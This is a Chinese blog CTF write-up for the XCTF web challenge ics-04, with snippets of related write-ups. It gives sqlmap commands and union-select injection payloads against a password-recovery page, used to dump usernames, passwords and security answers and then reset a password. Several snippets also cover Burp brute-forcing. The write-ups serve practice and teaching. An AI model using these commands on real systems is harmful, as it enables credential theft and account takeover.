攻防世界web高手进阶区ics-04

最新推荐文章于 2023-10-28 11:25:49 发布
最新推荐文章于 2023-10-28 11:25:49 发布
阅读量1.5k 收藏 1
点赞数
文章标签: 攻防世界WEB进阶之isc-04
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43885355/article/details/103263178
版权

攻防世界web高手进阶区ics-04

这是看了 harry_c 写的,做的一个补充,harry_c 写的链接是:
https://blog.csdn.net/harry_c/article/details/98540820
写得粗糙多多见谅

实操

1、使用命令进行sql注入,猜解到4个数据库
cetc004
information_schema
mysql
performance_schema
在这里插入图片描述2、打出列表
在这里插入图片描述3、根据列表打出用户名和密码

在这里插入图片描述在这里插入图片描述就得到了用户名和密码
4、
回到题目用这个用户名和密码登录得到flag
在这里插入图片描述5、没事做也可以打出密保的问题和答案,把密码直接改了。
sqlmap -u “http://111.198.29.45:48845/findpwd.php” --data=“username=a” -D cetc004 -T user -C “question,answer” --dump

xiaohuanxong
关注
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界4.ics-06
weixin_49765221的博客
04-14 491
打开链接,显示的是一个网页界面随便点击后,只有报表中心可以查看3、暴力破解 3.1、选择攻击载荷 3.2、选择攻击载荷类型 3.3、设置使用的线程、错误重试次数等(可不设置) 3.4、开始攻击使用burpsuit进行页面抓包鼠标右键,点击send to intrudernumber(数值)在1-10000之间进行爆破,每隔一个试一次,按照图示内容进行设置。正在爆破下图为暴力破解完毕,点击【Length】按长度进行排序,发现在2333时有可疑长度。
【愚公系列】2023年06月 攻防世界-Webics-02)
时光隧道
06-21 6984
SSRF(服务器端请求伪造)是一种攻击技术,攻击者通过构造恶意请求,欺骗服务器发起外部请求,获取服务器本应该不被直接访问的信息或服务。攻击者可利用 SSRF 进行一系列攻击,包括对内部资源进行扫描、窃取敏感信息、攻击内部系统等。SQL 注入是一种常见的 Web 攻击技术,攻击者通过在输入框等用户交互界面中注入 SQL 代码,进而控制数据库操作,例如读取、修改、删除等。攻击者可通过 SQL 注入进行窃取敏感信息、篡改数据,或直接攻击数据库服务器等。
攻防世界-webics-06
weixin_73625393的博客
10-28 1333
点击【设置】后,将代理改为【手动配置代理】,将HTTP代理内容改为在brupsuite中查看到的代理ip,更改完后点击【确定】框3是对可疑的数据进行暴力破解,需要将它做个标识,将光标放到1前,然后按框4的键,对1标识进行暴力破解,鼠标右键,点击【Send to Intruder】发送到【Intruder】,快捷键为【Ctrl+l】方法一:打开【设置】后,在【常规】中,翻到最下边,找到【网络设置】,打开【设置】返回下图界面,进行设置,设置完成后,按框5,执行。点击框5后,破解,下图为正在破解中。
攻防世界ics-06
淡巴枯的博客
12-20 1689
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
[wp] 攻防世界 ics-04
热门推荐
MercyLin的博客
09-24 3万+
尝试注册登陆账号 扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入 sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --...
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
网络安全 - Web 安全攻防 - 反射型 XSS 实验包 - ReflectiveXSSLab.zip
最新发布
09-22
**ReflectiveXSSLab.zip** 是一个专注于网络安全领域中 Web 安全攻防实战的实验包,特别针对反射型 XSS(跨站脚本攻击)进行设计。反射型 XSS 是一种常见的 Web 安全漏洞,攻击者通过在 URL 参数中注入恶意脚本,当...
攻防世界WEB进阶isc-04
harry_c的博客
08-06 1823
攻防世界WEB进阶isc-04第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 4星 题目来源: XCTF 4th-CyberEarth 题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目页面是之前做过的,但是漏洞位置换了,在注册和登录页面,使用注册功能反复注册,返回的注册页面显示为普通用户注册,并且登录之后显示普通用户登录没什么用,猜想是否存在特殊的账...
攻防世界ics-04解题思路
zsqad的博客
12-10 1776
题目 攻防世界ics-04 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 解题思路 打开题目提供的环境,发现整个页面只有注册、登录、找回密码功能是可以用的,尝试注册一个账户进行登录,提示普通用户登录成功,没什么用,可以猜测出题者的意图是让我们拿到管理员账号登录获得flag。 打开找回密码界面,随意输入一个用户名,发现界面上会提示没有这个用户,因此此处应该可以爆破用户名,但是如果用...
[xctf]ics-04
胖胖的ALEX
07-10 4399
类型:web 网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918 描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag 一句话总结:sql注入、业务逻辑漏洞 过程: 有三个可以访问的功能,注册、登录和找回密码 注册功能:没有sql注入,一个账号可以重复注册漏洞...
攻防世界-高手进阶ics-04
Sacrifice_li的博客
06-11 827
进来页面是这样的: 注册页面: 我们就尝试随便注册一个用户,然后登陆发现没啥用: 这里还有一个忘记密码可以点击: 可以猜测这里有没有注入漏洞: 我注册的用户名为1,然后去试试 1’ and 1=1# 以及 1' and 1=2# ,发现是存在注入漏洞的。 然后就去判断字段数以及那个字段是有回显的,1' order by 4# 可以显示,然后-1’ union select 1,2,3,4: 3的位置是回显位置,接下来就是去找数据库名: -1' union select .
攻防世界-web-ics-06--XCTF 4th-CyberEarth
Sea_Sand息禅
04-23 6351
进入index.php,发现可以传参,bp爆破,当id=2333时拿到flag
攻防世界 Ics 04
xiaoqi199915的博客
06-04 443
攻防世界 Ics 04 sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=a” -D cetc004 –tables user -C “username,password” --dump sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=1” sqlmap.py -u “http://124.126.19.106:521
XCTF ics-04
qq_41941506的博客
05-20 2844
根据题目提示在登录及注册中有漏洞 首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入, python2 sqlmap.py -r post.txt --dump -C "username,password...
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4687
尝试
攻防世界XCTF:ics-04
末初的CSDN博客
03-13 1125
有三个可以访问的地方,注册,登录和找回密码 注册功能:没有sql注入,但是测试出一个账号可以重复注册 登录功能:也没有sql注入,一个账号能够使用不同的面登录 找回密码页面存在SQL注入 sqlmap扫一波 记住需要指定参数 python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值